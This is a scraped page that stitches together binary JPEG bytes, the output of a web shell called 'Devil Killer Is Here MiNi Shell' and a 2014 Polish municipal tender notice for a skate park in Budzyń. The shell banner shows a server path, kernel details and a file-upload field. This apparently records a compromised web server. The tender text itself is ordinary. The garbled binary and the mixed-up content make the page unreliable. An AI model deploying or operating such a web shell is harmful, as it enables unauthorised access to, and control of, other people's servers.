JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140829/185631-N-2014.html

<p class="kh_header"><b>Budzyń: Budowa skate parku na Osiedlu Zielonym w Budzyniu</b><br>
<b>Numer ogłoszenia: 185631 - 2014; data zamieszczenia: 29.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Budzyń , ul. Lipowa 6, 64-840 Budzyń, woj. wielkopolskie, tel. 067 2843201, faks 067 2843313.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.budzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa skate parku na Osiedlu Zielonym w Budzyniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z zadaniem pn.: 
Budowa skate parku na Osiedlu Zielonym w Budzyniu .
Przedmiotem inwestycji jest budowa skate parku w obrębie  działki  o numerze ewidencyjnym 1845, położonej w Budzyniu, rejon Osiedla Zielonego. Projektowana inwestycja polega na montażu atestowanych urządzeń użytkowych przez deskorolkowców, BMX i rolkowców na utwardzonym terenie wykonanym z kostki betonowej z okrawężnikowaniem.
 W ramach zadania będą wykonywane następujące ważniejsze roboty
- wykonanie niezbędnych robót ziemnych i przygotowawczych
- wykonanie podbudowy
-wykonanie nawierzchni z kostki betonowej bezfazowej  gr 6 cm oraz obrzeży
- dostawa i montaż elementów skate parku wraz z regulaminem zgodnie z zaproponowanymi    
  elementami w dokumentacji technicznej 
3.	Wykonanie przedmiotu zamówienia
1)	 Wymagania dotyczące wszystkich zamawianych elementów:
-fabrycznie nowe,
-urządzenia muszą posiadać aktualne certyfikaty upoważniające do oznaczania wyrobu znakiem bezpieczeństwa,
-prace związane z montażem urządzeń należy wykonać zgodnie z instrukcją producenta urządzeń,
-wszystkie urządzenia mają być zamontowane zachowaniem stref bezpieczeństwa. W strefie bezpieczeństwa nie wolno umieszczać żadnych przedmiotów, innych urządzeń, ławek itp.,
-Wykonawca musi posiadać  na terenie Polski  serwis gwarancyjny
   i  pogwarancyjny oferowanych urządzeń. W ramach obsługi serwisowej w okresie 
  gwarancji Wykonawca zobowiązany jest do wykonywania napraw gwarancyjnych 
    oraz corocznych przeglądów technicznych dostarczonych urządzeń,
-Wykonawca jest zobowiązany zrealizować zamówienie w taki sposób,
     aby maksymalnie ograniczyć szkody na terenie przyległym do terenu
   inwestycji, powstałe podczas transportu i instalacji urządzeń. Po zakończeniu 
  prac instalacyjnych Wykonawca jest zobowiązany przywrócić teren do stanu   
  pierwotnego.
2)	Szczegółowy zakres rzeczowy robót do wykonania zamówienia zawiera dokumentacja
techniczna stanowiąca załącznik do zgłoszenia robót nie wymagających pozwolenia na budowę, przedmiar robót, specyfikacja techniczna wykonania  i odbioru robót . Oryginały w wersji papierowej projektów technicznych, innych  dokumentów przetargowych  są do wglądu w siedzibie  Zamawiającego.
3)	Wykonawca odpowiedzialny będzie za całokształt wykonania przedmiotu zamówienia, w tym za przebieg i terminowe wykonanie zamówienia w okresie wykonywania umowy, oraz uzyskanie  wszelkich niezbędnych, wymaganych prawem: uzgodnień, opracowań, zezwoleń, zaświadczeń, protokołów. Wszystkie dokumenty opisujące przedmiot zamówienia (dokumentacja techniczna, przedmiary robót,  oraz specyfikacje techniczne wykonania i odbioru robót, decyzje administracyjne) należy traktować jako wzajemnie uzupełniające się. 
4)	Przedmiot   zamówienia   obejmuje   również   wszystkie   prace   i   obowiązki   Wykonawcy wymienione we wzorze umowy.
5)	Rozliczenie inwestycji ryczałtowe - wartość zapisana w ofercie musi zawierać wszystkie elementy niezbędne do wykonania przedmiotu zamówienia na podstawie dokumentacji SIWZ, także koszt energii elektrycznej i wody zużytych podczas prac. 
6)	Załączone do oferty kosztorysy ofertowe sporządzone na podstawie przedmiarów robót  stanowić będą tylko materiał pomocniczy, poglądowy dla Zamawiającego
i nie będą podlegać weryfikacji oraz ocenie. W przypadku złożenia przez Wykonawcę kosztorysu ofertowego sporządzonego metodą kalkulacji uproszczonej Wykonawca na żądanie Zamawiającego przedłoży  szczegółowe kalkulacje cen jednostkowych.
7)	Wszystkie dostarczone i zamontowane urządzenia muszą być nowe. Nie dopuszcza się urządzeń prototypowych. Dostarczane urządzenia muszą być pracujące, posiadać wymagane certyfikaty lub deklaracje zgodności CE. Do wykonania zamówienia wykonawca zobowiązany jest użyć materiałów gwarantujących odpowiednią jakość, o parametrach technicznych i jakościowych odpowiadających właściwościom materiałów przyjętych w projekcie, posiadające stosowne atesty, certyfikaty, aprobaty techniczne, świadectwa jakości. 
8)	Wykonawca po zakończeniu robót zwróci Zamawiającemu otrzymaną oryginalną dokumentację techniczną oraz przygotuje i złoży w formie papierowej trwale spiętej wymagane dokumenty odbiorowe , rysunki z naniesionymi zmianami, jeżeli w toku wykonywania robót konieczne były zmiany dokumentacji projektowej oraz dokumenty gwarancyjne wraz z warunkami gwarancji wszystkich zamontowanych urządzeń, instrukcje i inne dokumenty zgromadzone w trakcie wykonywania przedmiotu zamówienia, a odnoszące się do jego realizacji.
4.	Warunki gwarancji jakości i rękojmi za wady
1)	Zamawiający ustanawia okres rękojmi i gwarancji na wykonane roboty objęte przedmiotem zamówienia na okres 36 miesięcy od daty sporządzenia pisemnego, protokolarnego zakończenia i odbioru robót, 
2)	W tym okresie Wykonawca na własny koszt finansowy zobowiązany jest do usunięcia wszelkich stwierdzonych komisyjnie usterek i nieprawidłowości zapisanych w stosownym protokole usterek,
5.	Rozwiązania równoważne
Wszystkie elementy zamówienia należy wykonać w nowoczesnej technologii, spełniające wymogi zapisane w obowiązujących przepisach, normach i wytycznych dotyczących obiektów użyteczności publicznej. Zaproponowane w dokumentach i elementach opisujących przedmiot zamówienia nazwy materiałów i urządzeń lub jakichkolwiek innych wyrobów lub produktów służą określeniu pożądanego wymaganego przez Zamawiającego standardu wykonania i określenia właściwości i wymogów techniczno-użytkowych założonych w dokumentacji technicznej dla danego typu rozwiązań, nie są obowiązujące i należy je traktować, jako propozycje rozwiązań przyjętych przez projektantów . Nie są one w żaden sposób wiążące przyszłego wykonawcę do ich stosowania pod warunkiem zaproponowania przez Wykonawcę materiałów równoważnych o parametrach techniczno - użytkowych odpowiadających co najmniej parametrom i właściwościach technicznych materiałów zaproponowanych w dokumentacji projektowej, przedmiarach robót.
6.	Warunki rozliczenia wykonania przedmiotu zamówienia oraz warunki dotyczące zamówień dodatkowych i uzupełniających
1)	 Z wybranym wykonaną zostanie zawarta umowa z wynagrodzeniem ryczałtowym
(zawierające wszystkie elementy/pochodne związane z realizacją przedmiotu zamówienia) do którego mają zastosowanie postanowienia art. 632 § 1 Kodeksu cywilnego. 
2)	Rozliczanie robót odbędzie się jedną fakturą końcową po uprzednim odbiorze końcowym wykonanych robót przez komisję odbiorową.
3)	Termin zapłaty faktur Wykonawcy wynosić będzie do 30 dni od daty wpływu do Zamawiającego prawidłowo wystawionej faktury VAT. Należności za wykonane roboty będą regulowane przelewem na rachunek Wykonawcy wskazany w fakturze VAT.
4)	Zamawiający nie przewiduje udzielenie zamówień uzupełniających.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1, 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wyznaczył - nie ustanowił wadium dla prowadzonego postępowania</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania przedmiotowego warunku. 
Zamawiający dokona oceny spełniania warunków na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy oraz dokumentów złożonych przez Wykonawcę w ofercie zgodnie z załącznikiemnr 3 do SIWZ.
Zamawiający dokona oceny spełniania powyższych warunków na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia ten warunek, jeżeli w okresie ostatnich pięciu lat przed upływem
 terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a
 jeżeli okres prowadzenia działalności jest krótszy-w tym okresie  wykonał co najmniej 1 zadanie  polegające na budowie, montażu urządzeń  skate parku (w tym wykonaniu nawierzchni utwardzonych) lub podobnych elementów infrastruktury sportowej, odpowiadającej przedmiotowi zamówienia o łącznej  wartości 1 zadania minimum: 50 000,00 zł brutto. 
Uwaga:
-Za jedną robotę należy uznać   robotę będącą przedmiotem jednej umowy.
-Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. Wykonawca 
w takiej sytuacji zobowiązany będzie udowodnić Zamawiającemu, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji prawa korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia.
Opis sposobu dokonania oceny tego warunku:
Zamawiający dokona oceny na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy oraz na podstawie  złożonego wykazu wykonanych robót budowlanych i dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dokumenty o których mowa wyżej  Wykonawca przedstawi w ofercie w postaci:
a) poświadczeń, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług
   okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na
  3 miesiące przed upływem terminu składania ofert,
b)	w przypadku zamówień na roboty budowlane - inne dokumenty - jeżeli z
        uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie
       uzyskać poświadczenia o którym mowa w pkt.a).
Zamawiający dokona oceny spełniania powyższych warunków na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują lub będą dysponować potencjałem technicznym niezbędnym do wykonania zamówienia.
Zamawiający dokona oceny na podstawie oświadczenia wykonawcy, że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy oraz dokumentów złożonych przez Wykonawcę w ofercie zgodnie z załącznikiemnr 3 do SIWZ.
Zamawiający dokona oceny spełniania powyższych warunków na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie powyższego warunku należy potwierdzić wykazem osób zgodnie z załącznikiem nr 7 do SIWZ oraz podać informacje o podstawie dysponowania tymi osobami. 
Opis sposobu dokonania oceny tego warunku: 
Zamawiający dokona oceny warunku, jeżeli w wykazie sporządzonym według załącznika nr 7 do SIWZ, wykazana zostanie osoba posiadająca uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie -  to jest do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej w zakresie odpowiadającym przedmiotowi zamówienia lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów,
Zamawiający dokona oceny spełniania powyższych warunków na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie powyższego warunku należy potwierdzić opłaconą  polisą, a w przypadku jej braku innym dokumentem potwierdzającym, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę ubezpieczenia wynoszącą co najmniej kwotę: 50.000,00 zł.
Opis sposobu dokonania oceny tego warunku: 
Zamawiający dokona oceny spełniania warunków na podstawie oświadczenia wykonawcy(zgodnie z załącznikiem nr 3 do SIWZ), że spełnia wszystkie warunki określone przepisami art. 22 ust. 1 ustawy oraz dokumentów złożonych przez Wykonawcę do oferty.
Zamawiający dokona oceny spełniania powyższych warunków na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>1 zadanie  polegające na budowie, montażu urządzeń  skate parku (w tym wykonaniu nawierzchni utwardzonych) lub podobnych elementów infrastruktury sportowej, odpowiadającej przedmiotowi zamówienia o łącznej  wartości 1 zadania minimum: 50 000,00 zł brutto;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy tworzący jeden podmiot przedłożą wraz z ofertą stosowne pełnomocnictwo -  nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki.Uwaga: pełnomocnictwo, o którym mowa powyżej (pkt 1 i 2) może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W wyniku mogących zaistnieć uzasadnionych nieprzewidzianych w chwili obecnej okoliczności związanych z procesem inwestycyjnym i dofinansowaniem zadania przez instytucję współfinansującą operację ze środków pochodzących z Unii Europejskiej w ramach PROW 2007-2013, Zamawiający zastrzega sobie możliwość wprowadzenia  zmian w zakresie szczegółowego rozliczenia inwestycji. Fakt taki musi być udokumentowany pisemnie i zatwierdzony przez wszystkie strony umowy.
Zamawiający informuje-oświadcza, że w przypadku odstąpienia przez Wykonawcę od realizacji niniejszej umowy ( z jego winy) lub w przypadku nie wywiązania się z obowiązujących terminów, zakresów prac i utraty w związku z tym przez Zamawiającego przyznanego zewnętrznego  dofinansowania, skutkować to będzie nałożeniem kary finansowej  na Wykonawcę w wysokości kwoty utraconego dofinansowania przyznanego Zamawiającemu przez Samorząd Województwa Wielkopolskiego  wraz z należnymi odsetkami.
Zamawiający dopuszcza zmianę postanowień umowy w stosunku do treści złożonej oferty w zakresie zmiany całkowitej wartości zadania powstałej na skutek zmiany obowiązującej stawki podatku VAT w trakcie realizowanego zamówienia. Podstawą do tego będzie zmiana obowiązujących przepisów prawnych  w tym zakresie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.budzyn.pl (BIP-Przetargi)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Budzyń, ul.Lipowa 6, 64-840 Budzyń(bezpłatnie na wniosek) lub osobiście w siedzibie UG pokój nr 2..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2014 godzina 11:30, miejsce: Sekretariat Urzędu Gminy w Budzyniu ul. Lipowa 6, 64-840 Budzyń (pokój nr 12).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie realizowane przy dofinansowaniu ze środków z UE w ramach działania 413
